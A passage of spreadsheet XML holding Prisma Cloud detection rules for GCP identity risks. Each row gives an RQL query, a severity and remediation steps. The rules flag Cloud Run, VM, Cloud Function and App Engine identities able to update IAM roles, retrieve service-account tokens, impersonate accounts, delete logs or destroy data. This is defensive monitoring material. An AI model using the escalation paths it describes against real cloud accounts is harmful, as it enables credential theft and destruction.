          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3240" s="2" t="inlineStr"/>
      <c r="D3240" t="n">
        <v>0</v>
      </c>
      <c r="E3240" t="n">
        <v>18</v>
      </c>
      <c r="F3240" t="n">
        <v>0</v>
      </c>
      <c r="G3240" t="b">
        <v>1</v>
      </c>
      <c r="H32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0" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3240" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3240" t="inlineStr">
        <is>
          <t>GCP Cloud Run with administrative permissions</t>
        </is>
      </c>
      <c r="L3240" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3240" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3240" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3240" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3240" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3240" t="inlineStr"/>
      <c r="R3240" t="inlineStr"/>
      <c r="S3240" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3240" t="b">
        <v>1</v>
      </c>
      <c r="U3240" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3240" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3240" t="inlineStr">
        <is>
          <t>Identifies Cloud Run instances granted administrative permissions, increasing the blast radius in case of a potential comrpomise of the instance.</t>
        </is>
      </c>
      <c r="X3240" t="inlineStr">
        <is>
          <t>How to investigate?
1. In the Prisma Cloud Console, under the "Alerts" tab, select the "Asset Name", the "View JSON{}"
2. Scroll down to the "data" field, and under "spec/template/spec" make note of the service account listed
3. Still in the Prisma Cloud Console, select 'Investigate'
2. Paste the following query into the investigation prompt, replacing the placeholder with the name of the service account you obtained in the previous steps: config from iam where dest.cloud.type = 'GCP' AND grantedby.cloud.entity.name ='&lt;service account name&gt;'
4. In the results, under "Granted By Policy", you will see the policies attached to the service account
Once examining the policies and determining which permissions are unnecessary and can be removed based on the Cloud Run instance's intended use, sign in to your GCP account. In order to remove any unnecessary permissions , use the following remediation steps:
Navigate to the IAM service, and search for the Service account. Select the pencil icon to edit it's permissions, removing the relevant policy for a less privileged one sufficient for the account intended purpose.</t>
        </is>
      </c>
      <c r="Y324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0" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'run' AND action.access.isAdministrative = true</t>
        </is>
      </c>
      <c r="AA3240" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3240" t="inlineStr">
        <is>
          <t>2024-08-02 06:55:45</t>
        </is>
      </c>
      <c r="AC3240" t="inlineStr"/>
      <c r="AD3240" t="b">
        <v>1</v>
      </c>
      <c r="AE3240" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3240" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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0" t="inlineStr">
        <is>
          <t>1bc93b36-2e15-4d1f-b2b6-23e1a646f4e6</t>
        </is>
      </c>
      <c r="AI3240" t="inlineStr">
        <is>
          <t>1bc93b36-2e15-4d1f-b2b6-23e1a646f4e6</t>
        </is>
      </c>
      <c r="AJ3240" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3240" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3241">
      <c r="A3241" t="inlineStr"/>
      <c r="B3241" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3241" s="2" t="inlineStr"/>
      <c r="D3241" t="inlineStr"/>
      <c r="E3241" t="inlineStr"/>
      <c r="F3241" t="inlineStr"/>
      <c r="G3241" t="b">
        <v>1</v>
      </c>
      <c r="H32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1" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3241" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3241" t="inlineStr">
        <is>
          <t>GCP Cloud Run Instance Assigned IAM Role Update Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3241" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3241" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3241" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3241" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3241" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3241" t="inlineStr"/>
      <c r="R3241" t="inlineStr"/>
      <c r="S3241" t="inlineStr"/>
      <c r="T3241" t="b">
        <v>1</v>
      </c>
      <c r="U3241" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3241" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3241" t="inlineStr">
        <is>
          <t>An adversary able to retrieve and edit IAM roles could grant themselves additional permissions within the environment, escalating their privileges. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3241" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the Cloud Run instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y324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1" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'run' AND action.name CONTAINS ALL ( 'iam.roles.update', 'iam.roles.get' )</t>
        </is>
      </c>
      <c r="AA3241" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3241" t="inlineStr">
        <is>
          <t>2024-07-19 06:28:29</t>
        </is>
      </c>
      <c r="AC3241" t="inlineStr"/>
      <c r="AD3241" t="b">
        <v>1</v>
      </c>
      <c r="AE3241" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3241" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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1" t="inlineStr">
        <is>
          <t>e14de4d9-4414-4a6a-84ce-e1d04e24436b</t>
        </is>
      </c>
      <c r="AI3241" t="inlineStr">
        <is>
          <t>e14de4d9-4414-4a6a-84ce-e1d04e24436b</t>
        </is>
      </c>
      <c r="AJ3241" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3241" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3242">
      <c r="A3242" t="inlineStr"/>
      <c r="B3242" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3242" s="2" t="inlineStr"/>
      <c r="D3242" t="inlineStr"/>
      <c r="E3242" t="inlineStr"/>
      <c r="F3242" t="inlineStr"/>
      <c r="G3242" t="b">
        <v>1</v>
      </c>
      <c r="H32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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3242" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3242" t="inlineStr">
        <is>
          <t>GCP Cloud Run Instance Assigned Cloud Function Creation Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3242" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3242" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3242" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3242" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3242" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3242" t="inlineStr"/>
      <c r="R3242" t="inlineStr"/>
      <c r="S3242" t="inlineStr"/>
      <c r="T3242" t="b">
        <v>1</v>
      </c>
      <c r="U3242" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3242" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3242" t="inlineStr">
        <is>
          <t>An adversary able to create Cloud Function instances with Service Account impersonation privileges would be able to escalate their permissions creating an instance which performs attacker controlled actions using the permissions of an impersonated Service Account. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3242" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the Cloud Run instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y324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2" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'run' AND action.name CONTAINS ALL ( 'cloudfunctions.functions.create', 'cloudfunctions.functions.sourceCodeSet', 'iam.serviceAccounts.actAs' )</t>
        </is>
      </c>
      <c r="AA3242" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3242" t="inlineStr">
        <is>
          <t>2024-10-30 16:49:52</t>
        </is>
      </c>
      <c r="AC3242" t="inlineStr"/>
      <c r="AD3242" t="b">
        <v>1</v>
      </c>
      <c r="AE3242" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3242" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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2" t="inlineStr">
        <is>
          <t>61a4e8d4-3f37-4733-bdf0-b7f1c41edb50</t>
        </is>
      </c>
      <c r="AI3242" t="inlineStr">
        <is>
          <t>61a4e8d4-3f37-4733-bdf0-b7f1c41edb50</t>
        </is>
      </c>
      <c r="AJ3242" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3242" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3243">
      <c r="A3243" t="inlineStr"/>
      <c r="B3243" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3243" s="2" t="inlineStr"/>
      <c r="D3243" t="inlineStr"/>
      <c r="E3243" t="inlineStr"/>
      <c r="F3243" t="inlineStr"/>
      <c r="G3243" t="b">
        <v>1</v>
      </c>
      <c r="H32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3" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3243" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3243" t="inlineStr">
        <is>
          <t>GCP Compute Instance (VM/Cloud Function) Assigned IAM Role Update Permissions Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3243" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3243" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3243" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3243" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3243" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3243" t="inlineStr"/>
      <c r="R3243" t="inlineStr"/>
      <c r="S3243" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3243" t="b">
        <v>1</v>
      </c>
      <c r="U3243" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3243" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3243" t="inlineStr">
        <is>
          <t>An adversary able to retrieve and edit IAM roles could grant themselves additional permissions within the environment, escalating their privileges. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3243" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the VM or Cloud Function instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y324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3" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.resource.type IN ('Instances', 'functions') AND action.name CONTAINS ALL ( 'iam.roles.update', 'iam.roles.get' )</t>
        </is>
      </c>
      <c r="AA3243" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3243" t="inlineStr">
        <is>
          <t>2024-09-02 06:33:53</t>
        </is>
      </c>
      <c r="AC3243" t="inlineStr"/>
      <c r="AD3243" t="b">
        <v>1</v>
      </c>
      <c r="AE3243" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3243" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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3" t="inlineStr">
        <is>
          <t>f18aa33b-ca72-4a07-bba2-00a5658dcf7a</t>
        </is>
      </c>
      <c r="AI3243" t="inlineStr">
        <is>
          <t>f18aa33b-ca72-4a07-bba2-00a5658dcf7a</t>
        </is>
      </c>
      <c r="AJ3243" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3243" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3244">
      <c r="A3244" t="inlineStr"/>
      <c r="B3244" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3244" s="2" t="inlineStr"/>
      <c r="D3244" t="n">
        <v>0</v>
      </c>
      <c r="E3244" t="n">
        <v>21</v>
      </c>
      <c r="F3244" t="n">
        <v>0</v>
      </c>
      <c r="G3244" t="b">
        <v>1</v>
      </c>
      <c r="H32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4" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3244" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3244" t="inlineStr">
        <is>
          <t>GCP Cloud Function with permissions to disrupt logging</t>
        </is>
      </c>
      <c r="L3244" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3244" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3244" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3244" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3244" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3244" t="inlineStr"/>
      <c r="R3244" t="inlineStr"/>
      <c r="S3244" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3244" t="b">
        <v>1</v>
      </c>
      <c r="U3244" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3244" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3244" t="inlineStr">
        <is>
          <t>This IAM policy maintains vigilant control over pivotal operations within Google Cloud's 'cloudfunctions' service, with a specific focus on ensuring the integrity of event logging. By thoughtfully governing the management of logging metrics, buckets, logs, and sinks within the 'logging' service, this policy serves as a robust safeguard against unauthorized alterations. This fortified control mitigates the potential for unauthorized manipulations, thereby thwarting any attempts to evade proper event logging during lateral movement. The policy contributes to a resilient and secure GCP environment</t>
        </is>
      </c>
      <c r="X3244" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the GCP console
2. Navigate to the Cloud Function
3. Navigate to the IAM service
4. Find the binding between the service account used by the function instance and the Admin role
5. Remove the binding
6. Create a new binding with predefined or custom role without risky permissions, if necessary. Repeat if there is a binding of the service account with another Admin role</t>
        </is>
      </c>
      <c r="Y324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4" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'cloudfunctions' AND action.name IN ('logging.logMetrics.delete', 'logging.logMetrics.update', 'logging.buckets.delete', 'logging.buckets.update', 'logging.logs.delete', 'logging.sinks.delete', 'logging.sinks.update') AND dest.cloud.service.name = 'logging'</t>
        </is>
      </c>
      <c r="AA3244" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3244" t="inlineStr">
        <is>
          <t>2024-07-19 06:28:29</t>
        </is>
      </c>
      <c r="AC3244" t="inlineStr"/>
      <c r="AD3244" t="b">
        <v>1</v>
      </c>
      <c r="AE3244" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3244" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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4" t="inlineStr">
        <is>
          <t>1e3afc03-f3b6-4000-b833-721bf5636d89</t>
        </is>
      </c>
      <c r="AI3244" t="inlineStr">
        <is>
          <t>1e3afc03-f3b6-4000-b833-721bf5636d89</t>
        </is>
      </c>
      <c r="AJ3244" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3244" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3245">
      <c r="A3245" t="inlineStr"/>
      <c r="B3245" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3245" s="2" t="inlineStr"/>
      <c r="D3245" t="inlineStr"/>
      <c r="E3245" t="inlineStr"/>
      <c r="F3245" t="inlineStr"/>
      <c r="G3245" t="b">
        <v>1</v>
      </c>
      <c r="H32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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3245" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3245" t="inlineStr">
        <is>
          <t>GCP Users and Machine Identities with Excessive Policies</t>
        </is>
      </c>
      <c r="L3245" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3245" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3245" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3245" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3245" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3245" t="inlineStr"/>
      <c r="R3245" t="inlineStr"/>
      <c r="S3245" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3245" t="b">
        <v>1</v>
      </c>
      <c r="U3245" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3245" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3245" t="inlineStr">
        <is>
          <t>This policy identifies GCP roles that contain '*' in Action, and the level of role assignment is Folder or higher.
Roles with '*' in the Action section for a folder or higher scope (like organization) allow users to perform any action on any resource within that scope. This is risky because:
- Unrestricted Access: Users can bypass security measures and potentially delete critical resources or modify configurations.
- Accidental Damage: Mistakes can have a significant impact, deleting entire resources or services.
- Elevated Attack Surface: A compromised account with such a role gives attackers vast control.</t>
        </is>
      </c>
      <c r="X3245"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4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5" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'GCP' and grantedby.level.type IN ( 'GCP Folder', 'GCP Organization' ) and grantedby.cloud.policy.isexcessive = true</t>
        </is>
      </c>
      <c r="AA3245" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3245" t="inlineStr">
        <is>
          <t>2024-09-27 06:26:54</t>
        </is>
      </c>
      <c r="AC3245" t="inlineStr"/>
      <c r="AD3245" t="b">
        <v>1</v>
      </c>
      <c r="AE3245" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3245" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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5" t="inlineStr">
        <is>
          <t>3ba83f42-9cff-47ae-bb54-aee6c873667a</t>
        </is>
      </c>
      <c r="AI3245" t="inlineStr">
        <is>
          <t>3ba83f42-9cff-47ae-bb54-aee6c873667a</t>
        </is>
      </c>
      <c r="AJ3245" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3245" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3246">
      <c r="A3246" t="inlineStr"/>
      <c r="B3246" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3246" s="2" t="inlineStr"/>
      <c r="D3246" t="inlineStr"/>
      <c r="E3246" t="inlineStr"/>
      <c r="F3246" t="inlineStr"/>
      <c r="G3246" t="b">
        <v>1</v>
      </c>
      <c r="H32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6" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3246" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3246" t="inlineStr">
        <is>
          <t>GCP Cloud Run Instance Assigned Permissions to Retrieve Service Account Tokens Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3246" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3246" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3246" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3246" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3246" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3246" t="inlineStr"/>
      <c r="R3246" t="inlineStr"/>
      <c r="S3246" t="inlineStr"/>
      <c r="T3246" t="b">
        <v>1</v>
      </c>
      <c r="U3246" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3246" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3246" t="inlineStr">
        <is>
          <t>An adversary able to retrieve Service Account tokens could authenticate as high-privileged Service Accounts, escalating their original privileges. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3246" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the Cloud Run instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y324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6" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'run' AND action.name CONTAINS ALL ( 'iam.serviceAccounts.getAccessToken', 'iam.serviceAccounts.get' )</t>
        </is>
      </c>
      <c r="AA3246" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3246" t="inlineStr">
        <is>
          <t>2024-10-30 16:57:22</t>
        </is>
      </c>
      <c r="AC3246" t="inlineStr"/>
      <c r="AD3246" t="b">
        <v>1</v>
      </c>
      <c r="AE3246" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3246" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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6" t="inlineStr">
        <is>
          <t>7b3e8f84-6c60-411e-b6f9-c3182681fc24</t>
        </is>
      </c>
      <c r="AI3246" t="inlineStr">
        <is>
          <t>7b3e8f84-6c60-411e-b6f9-c3182681fc24</t>
        </is>
      </c>
      <c r="AJ3246" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3246" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3247">
      <c r="A3247" t="inlineStr"/>
      <c r="B3247" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3247" s="2" t="inlineStr"/>
      <c r="D3247" t="n">
        <v>0</v>
      </c>
      <c r="E3247" t="n">
        <v>183</v>
      </c>
      <c r="F3247" t="n">
        <v>626</v>
      </c>
      <c r="G3247" t="b">
        <v>1</v>
      </c>
      <c r="H32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7" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3247" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3247" t="inlineStr">
        <is>
          <t>GCP VM instance with data destruction permissions</t>
        </is>
      </c>
      <c r="L3247" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3247" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3247" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3247" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3247" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3247" t="inlineStr"/>
      <c r="R3247" t="inlineStr"/>
      <c r="S3247" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3247" t="b">
        <v>1</v>
      </c>
      <c r="U3247" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3247" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3247" t="inlineStr">
        <is>
          <t>With access to  'compute.instances.delete', 'compute.disks.delete', 'compute.snapshots.delete', 'compute.images.delete', 'storage.buckets.delete', 'cloudsql.databases.delete', 'cloudsql.instances.delete', 'file.instances.delete' permissions an adversary can destroy sensitive information stored in your cloud resources, making irreversible damage to your organization</t>
        </is>
      </c>
      <c r="X3247"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4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7" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.type = 'GCP' AND source.cloud.service.name = 'compute' and source.cloud.resource.type = 'Instances' AND action.name IN ( 'compute.instances.delete', 'compute.disks.delete', 'compute.snapshots.delete', 'compute.images.delete', 'storage.buckets.delete', 'cloudsql.databases.delete', 'cloudsql.instances.delete', 'file.instances.delete' )</t>
        </is>
      </c>
      <c r="AA3247" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3247" t="inlineStr">
        <is>
          <t>2024-10-30 16:57:22</t>
        </is>
      </c>
      <c r="AC3247" t="inlineStr"/>
      <c r="AD3247" t="b">
        <v>1</v>
      </c>
      <c r="AE3247" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3247" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG32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7" t="inlineStr">
        <is>
          <t>7a283e4c-0137-474c-a778-3cdb8fdd6ce3</t>
        </is>
      </c>
      <c r="AI3247" t="inlineStr">
        <is>
          <t>7a283e4c-0137-474c-a778-3cdb8fdd6ce3</t>
        </is>
      </c>
      <c r="AJ3247" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3247" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3248">
      <c r="A3248" t="inlineStr"/>
      <c r="B3248" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3248" s="2" t="inlineStr"/>
      <c r="D3248" t="inlineStr"/>
      <c r="E3248" t="inlineStr"/>
      <c r="F3248" t="inlineStr"/>
      <c r="G3248" t="b">
        <v>1</v>
      </c>
      <c r="H32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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J3248" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3248" t="inlineStr">
        <is>
          <t>GCP App Engine Web Service Assigned Cloud Run Creation Which Could Lead to Privilege Escalation</t>
        </is>
      </c>
      <c r="L3248" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3248" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3248" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3248" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3248" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3248" t="inlineStr"/>
      <c r="R3248" t="inlineStr"/>
      <c r="S3248" t="inlineStr"/>
      <c r="T3248" t="b">
        <v>1</v>
      </c>
      <c r="U3248" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3248" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3248" t="inlineStr">
        <is>
          <t>An attacker who successfully exploits a vulnerability or misconfiguration in the web service can leverage the permissions associated with the App Engine service. By creating Cloud Run instances with Service Account impersonation privileges they would be able to escalate their permissions creating an instance which performs attacker controlled actions using the permissions of an impersonated Service Account. This would allow them to further enumerate and exploite the environment.</t>
        </is>
      </c>
      <c r="X3248" t="inlineStr">
        <is>
          <t>Remediation steps:
 1. Sign in to GCP Console
 2.Navigate to the App Engine instance, and remove the attached Service Account's excessive permissions.</t>
        </is>
      </c>
      <c r="Y324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48" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'GCP' AND source.cloud.service.name = 'appengine' AND action.name CONTAINS ALL ( 'run.services.create', 'run.routes.invoke', 'iam.serviceAccounts.actAs' )</t>
        </is>
      </c>
      <c r="AA3248" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3248" t="inlineStr">
        <is>
          <t>2024-10-30 16:49:52</t>
        </is>
      </c>
      <c r="AC3248" t="inlineStr"/>
      <c r="AD3248" t="b">
        <v>1</v>
      </c>
      <c r="AE3248" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3248" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
